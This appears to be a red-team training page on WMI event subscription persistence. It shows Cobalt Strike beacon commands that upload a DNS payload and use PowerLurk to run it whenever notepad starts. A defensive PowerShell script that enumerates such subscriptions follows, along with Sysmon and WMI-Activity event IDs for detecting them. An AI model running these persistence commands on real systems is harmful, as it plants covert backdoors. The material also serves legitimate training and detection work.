# WMI Event Subscriptions

Persistence via WMI events can be achieved by leveraging the following three classes:

* EventConsumer
* EventFilter
* FilterToConsumerBinding


An EventConsumer is the action that we want to perform - in this case, to execute a payload. This can be via OS commands (such as a PowerShell one-liner) or VBScript. An EventFilter is a trigger that we can act upon. Any arbitrary WMI query can be used as a filter, which provides practically unlimited options: when a particular process starts, when a user logs in, when a USB device is inserted, at a specific time of day, or on a timed interval. The FilterToConsumerBinding simply links an EventConsumer and an EventFilter together.


[PowerLurk](https://github.com/Sw4mpf0x/PowerLurk) is a PowerShell tool for building these WMI events. In this example, I will upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started.

```
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
```


You can view these classes afterwards using `Get-WmiEvent -Name WmiBackdoor`. The *CommandLineTemplate* for the EventConsumer will simply be `C:\Windows\dns_x64.exe`, and the query for the EventFilter will be `SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'`.

Open notepad on Workstation 2 and the DNS Beacon will appear.


![](https://files.cdn.thinkific.com/file_uploads/584845/images/523/658/5e8/wmi-sub.png)


The backdoor can be removed with `Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject`.
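As an added defender-side example (not code from this page or from PowerLurk), the script below inventories the same three classes in `root\subscription` and resolves every binding back to its WQL trigger and the command or script it would run; the `ComputerName` parameter and the `Suspicious` flag are my own additions. Run against a host carrying the subscription created above, it surfaces the `Win32_ProcessStartTrace` query together with `C:\Windows\dns_x64.exe`.

```powershell
# Inventory permanent WMI event subscriptions and resolve each binding to its
# trigger and action. Assumes an elevated session and that the objects live in
# root\subscription, the namespace PowerLurk and most tooling write to.
param(
    [string]$ComputerName = $env:COMPUTERNAME   # local host unless told otherwise
)

$cim = @{ Namespace = 'root/subscription'; ComputerName = $ComputerName; ErrorAction = 'SilentlyContinue' }

# Index the filters by Name so a binding can be mapped back to its WQL query.
$filters = @{}
Get-CimInstance @cim -ClassName __EventFilter | ForEach-Object { $filters[$_.Name] = $_ }

# Only these two consumer classes execute attacker-supplied code; the others
# (log file, NT event log, SMTP) just record or mail the event.
$consumers = @{}
Get-CimInstance @cim -ClassName CommandLineEventConsumer | ForEach-Object {
    $consumers[$_.Name] = [pscustomobject]@{ Class = 'CommandLineEventConsumer'; Action = $_.CommandLineTemplate }
}
Get-CimInstance @cim -ClassName ActiveScriptEventConsumer | ForEach-Object {
    $consumers[$_.Name] = [pscustomobject]@{ Class = 'ActiveScriptEventConsumer'; Action = $_.ScriptText }
}

# Walk the bindings: each one joins exactly one filter to one consumer.
Get-CimInstance @cim -ClassName __FilterToConsumerBinding | ForEach-Object {
    $f = $filters[$_.Filter.Name]
    $c = $consumers[$_.Consumer.Name]
    [pscustomobject]@{
        Computer   = $ComputerName
        Filter     = $_.Filter.Name
        Query      = if ($f) { $f.Query } else { '<filter not found>' }
        Consumer   = $_.Consumer.Name
        Class      = if ($c) { $c.Class } else { '<non-code consumer>' }
        Action     = if ($c) { $c.Action } else { $null }
        # A code-executing consumer is worth a closer look; the built-in
        # "SCM Event Log Consumer" (NTEventLogEventConsumer) is the usual benign baseline.
        Suspicious = [bool]$c
    }
}
```

Sysmon event IDs 19, 20 and 21 record the creation of the filter, consumer and binding objects respectively, and Microsoft-Windows-WMI-Activity/Operational event 5861 logs new permanent consumer registrations, so the same activity can be alerted on at creation time rather than found by a later sweep.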
